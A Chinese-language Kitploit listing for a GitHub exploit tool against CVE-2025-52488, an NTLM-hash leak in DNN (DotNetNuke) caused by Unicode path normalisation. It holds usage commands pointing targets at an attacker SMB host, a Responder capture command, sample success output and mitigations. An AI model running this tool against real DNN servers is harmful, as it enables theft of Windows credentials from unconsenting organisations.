Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-52488 — 该漏洞利用工具针对 DNN(原名 DotNetNuke)6.0.0 至 10.0.1 版本之前的漏洞,该漏洞允许攻击者通过 Unicode 路径规整化攻击泄露 NTLM 哈希。 | Kitploit
工具/GitHubGitHub/sh4den/cve-2025-52488
侦察密码攻击漏洞分析漏洞利用Web应用程序漏洞利用信息收集
GitHubsh4den/cve-2025-52488

CVE-2025-52488

该漏洞利用工具针对 DNN(原名 DotNetNuke)6.0.0 至 10.0.1 版本之前的漏洞,该漏洞允许攻击者通过 Unicode 路径规整化攻击泄露 NTLM 哈希。

查看仓库
212个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

DNN Unicode路径规范化 NTLM 哈希泄露利用工具 (CVE-2025-52488)

概述

此利用工具针对 DNN(原名 DotNetNuke)版本 6.0.0 至 10.0.1 之前版本的漏洞,允许攻击者通过 Unicode 路径规范化攻击泄露 NTLM 哈希。

漏洞详情

  • CVE ID: CVE-2025-52488
  • 严重性: 高危(CVSS 8.6)
  • 受影响版本: 6.0.0 至 10.0.1 之前
  • 攻击向量: 网络
  • 认证: 不需要

工作原理

该利用工具滥用 Windows/.NET 的特殊机制和 Unicode 规范化,强制目标 DNN 服务器向攻击者控制的服务器发起 SMB 请求,从而可能在此过程中的身份验证流程中暴露 NTLM 哈希。

前提条件

  1. Python 3.7+
  2. 所需包(使用 pip install -r requirements.txt 安装)
  3. 用于捕获 NTLM 哈希的 SMB 服务器(例如 Responder、Burp Collaborator)

用法

基本用法

root@kitploit:~
python main.py targets.txt attacker.example.com

带自定义参数

root@kitploit:~
python main.py targets.txt 192.168.1.100 -t 20 --timeout 15

参数

  • targets: 包含 DNN 主机列表的文件(每行一个)
  • smb_server: 用于捕获 NTLM 哈希的 SMB 服务器主机名/IP
  • -t, --threads: 并发线程数(默认值:10)
  • --timeout: 请求超时秒数(默认值:10)

目标文件格式

创建一个文本文件,每行一个目标 URL:

root@kitploit:~
http://target1.example.com
https://target2.example.com:8080
target3.example.com

设置 SMB 服务器

你可以使用诸如 Responder 之类的工具来捕获 NTLM 哈希:

root@kitploit:~
responder -I eth0 -wrf

或使用 Burp Collaborator 进行带外检测。

示例输出

root@kitploit:~
[2025-01-XX-XX:XX:XX] [INFO] 针对 5 个目标启动 DNN NTLM 哈希泄露利用
[2025-01-XX-XX:XX:XX] [INFO] SMB 服务器: attacker.example.com
[2025-01-XX-XX:XX:XX] [SUCCESS] [target1.com] 检测到 DNN 标识: dnn_IsMobile
[2025-01-XX-XX:XX:XX] [SUCCESS] [target1.com] 文件上传端点可访问
[2025-01-XX-XX:XX:XX] [SUCCESS] [target1.com] 利用载荷已成功发送
[2025-01-XX-XX:XX:XX] [INFO] [target1.com] 请检查你的 SMB 服务器,查看是否有传入的 NTLM 身份验证尝试

检测标识

该利用工具会查找以下 DNN 标识:

  • dnn_IsMobile cookie
  • 响应中包含 dotnetnuke
  • 响应中包含 dnnconnect
  • 响应中包含 DNN Platform

缓解措施

  • 将 DNN 升级到 10.0.1 或更高版本
  • 实施网络层面控制,阻止向外部服务器发起 SMB 请求
  • 监控可疑的文件上传尝试

免责声明

本工具仅用于教育和授权安全测试目的。请负责任地使用,并仅在你拥有或明确允许测试的系统上使用。

参考资料

  • CVE-2025-52488
  • Assetnote Research
下载工具